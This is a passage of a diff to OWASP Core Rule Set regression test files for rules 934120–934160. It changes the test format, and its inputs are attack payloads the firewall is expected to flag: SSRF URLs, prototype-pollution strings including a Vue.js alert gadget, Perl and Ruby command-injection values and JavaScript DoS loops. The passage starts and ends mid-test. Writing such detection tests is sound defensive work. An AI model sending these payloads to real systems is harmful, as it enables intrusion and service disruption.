"HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-44 + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?http://2852039166/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://2852039166/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: application/xml + method: POST + uri: "/post" + data: "http://2852039166/" + version: "HTTP/1.1" + output: + log_contains: id "934120" + - test_id: 44 desc: SSRF - local_file:// url scheme - Dotless decimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=local_file://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=local_file://2852039166/" + version: "HTTP/1.1" + output: + log_contains: id "934120" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml index 3a667cc5a..f18d6bc0a 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml @@ -1,220 +1,206 @@ --- meta: author: "lifeforms, azurit" - enabled: true - name: "934130.yaml" description: "Tests for rule 934130" +rule_id: 934130 tests: - - test_title: 934130-1 + - test_id: 1 desc: negative test case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=proto" - version: HTTP/1.0 - output: - no_log_contains: id "934130" - - test_title: 934130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=proto" + version: HTTP/1.0 + output: + no_log_contains: id "934130" + - test_id: 2 desc: positive test case with JSON POST stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} - output: - log_contains: id "934130" - - test_title: 934130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + {"text":"a","title":{"__proto__":{"where":{"name":"sqlinjection","where":null}}}} + output: + log_contains: id "934130" + - test_id: 3 desc: positive test case, CVE-2021-20083 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__[test]=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__[test]=test" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 4 desc: positive test case, CVE-2021-20084, 1/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__.test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__.test=test" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 5 desc: positive test case, CVE-2021-20084, 2/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor.prototype.test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor.prototype.test=test" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 6 desc: positive test case with space evasion, CVE-2021-20084, 2/2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor.prototype.%20test=test" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor.prototype.%20test=test" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 7 desc: positive test case with GET parameter, jQuery $.get stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__[context]=" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__[context]=" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 8 desc: positive test case with GET parameter, V4Fire Core Library stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__%5Btest%5D%3D%7B%22json%22%3A%22value%22%7D" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 9 desc: positive test case with GET parameter, analytics-utils < 1.0.3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?constructor%5Bprototype%5D%5Btest%5D%3Dtest" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 10 desc: positive test case with GET parameter, jQuery $.get stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__[jquery]=x" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__[jquery]=x" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 11 desc: positive test case with GET parameter, Vue.js stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29" - version: HTTP/1.0 - output: - log_contains: id "934130" - - test_title: 934130-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29" + version: HTTP/1.0 + output: + log_contains: id "934130" + - test_id: 12 desc: "Detect example payload __proto__... submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=__proto__.foo=bar - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934130" - - test_title: 934130-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=__proto__.foo=bar + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934130" + - test_id: 13 desc: "Detect example payload __proto__... submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=__\u0070\u0072oto__.foo=bar - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=__proto__.foo=bar + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log_contains: id "934130" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml index f926730b5..04d1dd2e4 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml @@ -1,23 +1,21 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934140.yaml" description: "Tests for rule 934140" +rule_id: 934140 tests: - - test_title: 934140-1 + - test_id: 1 desc: Perl interpolation attack stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?x=@{[system+whoami]}" - version: HTTP/1.0 - output: - log_contains: id "934140" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=@{[system+whoami]}" + version: HTTP/1.0 + output: + log_contains: id "934140" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml index f52c43e6d..744933f91 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml @@ -1,23 +1,21 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934150.yaml" description: "Tests for rule 934150" +rule_id: 934150 tests: - - test_title: 934150-1 + - test_id: 1 desc: Ruby injection test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?x=Process.spawn(%22id%22)" - version: HTTP/1.0 - output: - log_contains: id "934150" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=Process.spawn(%22id%22)" + version: HTTP/1.0 + output: + log_contains: id "934150" diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml index 0289e3b7c..6b4f240fc 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml @@ -1,535 +1,501 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934160.yaml" description: "Tests for rule 934160" +rule_id: 934160 tests: - - test_title: 934160-1 + - test_id: 1 desc: Normal text false positive test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=while%20(foo)%20is%20bar." - version: HTTP/1.0 - output: - no_log_contains: id "934160" - - test_title: 934160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=while%20(foo)%20is%20bar." + version: HTTP/1.0 + output: + no_log_contains: id "934160" + - test_id: 2 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!false)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!false)" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 3 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!-0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!-0);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 4 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!%2B0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!%2B0);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 5 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!0);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 6 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!-0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!-0);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 7 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?eval=while(!"");' - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?eval=while(!"");' + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 8 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!'');" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!'');" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 9 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!``);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!``);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 10 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(true);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(true);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 11 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(Infinity);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(Infinity);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 12 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(-Infinity);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(-Infinity);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 13 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(%2BInfinity);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(%2BInfinity);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 14 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(-1);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(-1);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 15 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(%2B1);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(%2B1);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 16 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(new%20Date);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(new%20Date);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 17 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(this);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(this);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 18 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(String);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(String);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 19 desc: while truthy with negation (false positive) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!true);" - version: HTTP/1.0 - output: - no_log_contains: id "934160" - - test_title: 934160-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!true);" + version: HTTP/1.0 + output: + no_log_contains: id "934160" + - test_id: 20 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!{});" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!{});" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 21 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!![]);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!![]);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 22 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?eval=while(!!"");' - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?eval=while(!!"");' + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 23 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!'');" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!'');" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 24 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!``);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!``);" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 25 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!null)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!null)" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 26 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!undefined)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-27 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!undefined)" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 27 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!NaN)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-28 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!NaN)" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 28 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while((true)))" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-29 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while((true)))" + version: HTTP/1.0 + output: + log_contains: id "934160" + - test_id: 29 desc: "Detect example DoS loop while(true) submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=while(true);" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=while(true);" + 